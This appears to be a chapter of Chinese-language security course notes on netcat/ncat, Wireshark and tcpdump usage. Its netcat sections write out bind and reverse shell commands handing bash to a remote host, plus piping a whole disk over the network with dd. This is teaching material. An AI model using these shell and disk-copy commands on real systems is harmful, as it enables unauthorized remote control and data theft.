第五章 基本工具

常用工具：

• 经常使用且功能强大

• 安全从业者必不可少的帮手

• Nc / ncat

• Wireshark

• Tcpdump

 

NETCAT ——NC

• 网络工具中的瑞士军刀——小身材、大智慧

• 侦听模式 / 传输模式

• telnet / 获取banner信息

• 传输文本信息

• 传输文件/目录

• 加密传输文件

• 远程控制/木马

• 加密所有流量

• 流媒体服务器

• 远程克隆硬盘

 

NC——TELNET / BANNER

• nc –nv 1.1.1.1 110

• nc –nv 1.1.1.1 25

• nc –nv 1.1.1.1 80

 

NC——传输文本信息

• A：nc -l -p 4444

• B：nc –nv 1.1.1.1 4444

• 远程电⼦取证信息收集

 

NC——传输文件/目录

• 传输文件

• A：nc -lp 333 > 1.mp4

• B：nc -nv 1.1.1.1 333 < 1.mp4 –q 1

• 或

• A：nc -q 1 -lp 333 < a.mp4

• B： nc -nv 1.1.1.1 333 > 2.mp4

• 传输目录

• A：tar -cvf - music/ | nc -lp 333 –q 1

• B：nc -nv 1.1.1.1 333 | tar -xvf –

• 加密传文件

• A：nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4

• B： mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

 

NC——流媒体服务

• A： cat 1.mp4 | nc -lp 333

• B： 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

 

NC——端口扫描

• nc -nvz 1.1.1.1 1-65535

• nc –vnzu 1.1.1.1 1-1024

 

NC——远程克隆硬盘

• A： nc -lp 333 | dd of=/dev/sda

• B： dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1

• 远程电子取证，可以将目标服务器硬盘远程复制，或者内存。

 

NC——远程控制

• 正向：

• A：nc -lp 333 -c bash

• B：nc 1.1.1.1 333

• 反向：

• A：nc -lp 333

• B：nc 1.1.1.1 333 -c bash

• 注：Windows用户把bash改成cmd；

 

NC——NCAT

• Nc缺乏加密和身份验证的能力

• Ncat包含于nmap工具包中

• A：ncat ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl

• B：ncat -nv 1.1.1.1 333 --ssl

 

WIRESHARK

• 抓包嗅探协议分析

• 安全专家必备的技能

• 抓包引擎

• Libpcap9—— Linux

• Winpcap10—— Windows

• 解码能力

 

WIRESHARK——基本使用方法

• 启动

• 选择抓包网卡

• 混杂模式

• 实时抓包

• 保存和分析捕获文件

• 首选项

 

WIRESHARK——常见协议包

• 数据包的分层结构

• Arp

• Icmp

• Tcp——三次握手

• Udp

• Dns

• http

• ftp

 

WIRESHARK——TCP

• 数据流

• http

• Smtp

• Pop3

• Ssl

 

WIRESHARK——信息统计

• 节点数

• 协议分布

• 包大小分布

• 会话连接

• 解码方式

• 专家系统

• 抓包对比nc、ncat加密与不加密的流量

 

WIRESHARK——实践

• 抓包对比nc、ncat加密与不加密的流量

 

TCPDUMP

• No-GUI的抓包分析工具

• Linux、Unix系统默认安装

 

TCPDUMP——抓包

• 抓包

• tcpdump -i eth0 -s 0 -w file.pcap

• 读取抓包文件

• Tcpdump -r file.pcap

 

TCPDUMP——筛选

• tcpdump -n -r http.cap | awk '{print $3}'| sort –u

• tcpdump -n src host 145.254.160.237 -r http.cap

• tcpdump -n dst host 145.254.160.237 -r http.cap

• tcpdump -n port 53 -r http.cap

• tcpdump -nX port 80 -r http.cap

 

TCPDUMP——高级筛选

• tcpdump -A -n 'tcp[13] = 24' -r http.cap